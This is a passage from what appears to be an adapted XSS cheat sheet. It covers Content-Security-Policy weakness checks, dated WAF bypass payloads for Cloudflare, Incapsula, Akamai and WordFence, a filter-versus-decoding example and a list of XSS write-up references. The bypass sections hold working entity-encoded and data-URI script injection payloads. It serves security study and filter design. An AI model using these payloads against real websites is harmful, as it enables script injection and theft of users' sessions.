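  // data: in script-src permits <script src="data:,..."> (the @404death bypass).
  if (src.includes("data:"))
    findings.push("data: scheme allowed: <script src=\"data:,...\"> runs");

  // Wildcard scheme/host sources allow any remote script.
  if (src.some((s) => s === "*" || s === "http:" || s === "https:"))
    findings.push("wildcard source: any remote script runs");

  // An allow-listed JSONP host lets the attacker pick the executed callback.
  for (const s of src)
    if (JSONP_HOSTS.includes(hostOf(s)))
      findings.push("JSONP endpoint allowed: " + hostOf(s));

  // Without object-src (or a default-src to fall back on) <object data="data:text/html,..."> is allowed.
  if (!policy["object-src"] && !policy["default-src"])
    findings.push("object-src unrestricted: <object data=\"data:text/html,...\"> loads a scriptable document");

  return findings;
}

// Constructed headers matching the policies quoted in this section.
const POLICIES = {
  inline:  "default-src 'self' 'unsafe-inline';",
  data:    "script-src 'self' data:",
  jsonp:   "script-src 'self' https://www.google.com; object-src 'none'",
  strict:  "script-src 'nonce-abc' 'strict-dynamic'; object-src 'none'",
};
```

`cspWeaknesses(POLICIES.strict)` returns an empty list;  the other three each reproduce one of the conditions exploited above. The checker reads only the script and object directives; a real review also covers `base-uri`, `frame-ancestors` and reporting.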
## Common WAF Bypass

### Cloudflare XSS Bypasses by @Bohdan Korzhynskyi

#### 21st april 2020

#### 22nd august 2019

#### 5th july 2019

#### 3rd june 2019

`%26%230000000040` URL-decodes to `&#0000000040`, the HTML entity for `(` (leading zeros and a missing semicolon are accepted by the HTML parser), so the WAF never sees `prompt(`; the `srcdoc` variant hides `<script>` the same way with `&lt;`.

```html
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
```
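The Cloudflare payloads above and the "Bypass using HTML encoding" section both exploit a filter that inspects the raw attribute value rather than what the browser executes after entity decoding. The added example below (not from the original page) shows a minimal numeric-entity decoder, the kind of decoding a browser applies to an attribute, and a filter run before versus after it. The regular expressions and the filter rule are this example's own assumptions.

```javascript
// Added example (not from PayloadsAllTheThings): keyword filtering before and
// after HTML numeric entity decoding. Decoder and filter rule are assumptions.

// Decode &#NN; and &#xHH; the way an HTML parser does for attribute values:
// the semicolon is optional and leading zeros are ignored.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const cp = num[0].toLowerCase() === "x"
      ? parseInt(num.slice(1), 16)
      : parseInt(num, 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// A blacklist rule typical of a WAF: block "alert" or a call parenthesis.
const RULE = /alert|\(/i;

// Filter that inspects the raw attribute value (what the WAF sees on the wire
// after URL decoding).
function naiveFilterPasses(attrValue) {
  return !RULE.test(attrValue);
}

// Filter that inspects what the JavaScript engine will actually receive.
function decodingFilterPasses(attrValue) {
  return !RULE.test(decodeNumericEntities(attrValue));
}

// Constructed samples taken from the payloads on this page (after URL decoding).
const SAMPLES = {
  hexAlert:     "&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;", // alert(1)
  zeroPadded:   "prompt&#0000000040document.domain)",             // &#0000000040 -> (
  zeroPaddedHex:"prompt&#x000000028;document.domain)",            // &#x000000028; -> (
};
```

Decoding first and filtering second is the only order that matches the browser; a WAF that cannot do so will miss every entity variant of the same call.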
### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)

### Cloudflare XSS Bypass - 27th february 2018

The named entities (`&Tab;`, `&NewLine;`, `&colon;`, `&lpar;`) are decoded by the HTML parser, and the resulting tab and newline characters are then stripped from the URL scheme, leaving `javascript:(alert(document.domain))`.

```html
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
```

### Chrome Auditor - 9th august 2018

Live example by @brutelogic, payload `</script><svg><script>alert(1)-&apos;`

### Incapsula WAF Bypass by @Alra3ees - 8th march 2018

### Incapsula WAF Bypass by @c0d3G33k - 11th september 2018

```html
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```

### Incapsula WAF Bypass by @daveysec - 11th may 2019

Requires jQuery on the target page (`$.globalEval`).

```html
<svg onload\r\n=$.globalEval("al"+"ert()");>
```

### Akamai WAF Bypass by @zseano - 18th june 2018

### Akamai WAF Bypass by @s0md3v - 28th october 2018

```html
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
```

### WordFence WAF Bypass by @brutelogic - 12th september 2018

```html
<a href=javas&#99;ript:alert(1)>
```

## References

- Unleashing an Ultimate XSS Polyglot
- tbm
- (Relative Path Overwrite) RPO XSS - Infinite Security
- RPO TheSpanner
- RPO Gadget - innerhtml
- Relative Path Overwrite - Detectify
- XSS ghettoBypass - d3adend
- XSS without HTML: Client-Side Template Injection with AngularJS
- XSSING WEB PART - 2 - Rakesh Mane
- Making an XSS triggered by CSP bypass on Twitter - @tbmnull
- Ways to alert(document.domain) - @tomnomnom
- D1T1 - Michele Spagnuolo and Lukas Weichselbaum - So We Broke All CSPs
- Sleeping stored Google XSS Awakens a $5000 Bounty - Patrik Fehrenbach
- RPO that lead to information leakage in Google - filedescriptor
- God-like XSS, Log-in, Log-out, Log-in in Uber - Jack Whitton
- Three Stored XSS in Facebook - Nir Goldshlager
- Using a Braun Shaver to Bypass XSS Audit and WAF - Frans Rosen
- An XSS on Facebook via PNGs & Wonky Content Types - Jack Whitton
- Stored XSS in * - Jack Whitton
- Complicated, Best Report of Google XSS - Ramzes
- Tricky Html Injection and Possible XSS in - secgeek
- Command Injection in Google Console - Venkat S
- Facebook's Moves - OAuth XSS - Paulos Yibelo
- Stored XSS in Google Docs (Bug Bounty) - Harry M Gertos
- Stored XSS on via admin account compromise in Uber - James Kettle (albinowax)
- Yahoo Mail stored XSS - Klikki Oy
- Abusing XSS Filter: One ^ leads to XSS (CVE-2016-3212) - Masato Kinugawa
- Youtube XSS - fransrosen
- Best Google XSS again - Krzysztof Kotowicz
- IE & Edge URL parsing Problem - detectify
- Google XSS subdomain Clickjacking
- Microsoft XSS and Twitter XSS
- Google Japan Book XSS
- Flash XSS mega nz - frans
- Flash XSS in multiple libraries - Olivier Beg
- xss in google IE, Host Header Reflection
- Years ago Google xss
- xss in google by IE weird behavior
- xss in Yahoo Fantasy Sport
- xss in Yahoo Mail Again, worth $10000 - Klikki Oy
- Sleeping XSS in Google - securityguard
- Decoding a .htpasswd to earn a payload of money - securityguard
- Google Account Takeover
- AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2 - geekboy
- Uber Self XSS to Global XSS
- How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier
- Airbnb When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett
- XSSI, Client Side Brute Force
- postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson
- postMessage XSS Bypass
- XSS in Uber via Cookie - zhchbin
- Stealing contact form data on using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP - frans
- XSS due to improper regex in third party js Uber 7k XSS
- XSS in TinyMCE 2.4.0 - Jelmer de Hen
- Pass uncoded URL in IE11 to cause XSS
- Twitter XSS by stopping redirection and javascript scheme - Sergey Bobrov
- Auth DOM Uber XSS
- Managed Apps and Music: two Google reflected XSSes
- App Maker and Colaboratory: two Google stored XSSes
- XSS in
- Stored XSS, and SSRF in Google using the Dataset Publishing Language
- Stored XSS on Snapchat
- XSS cheat sheet - PortSwigger
- mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang
- Self Closing Script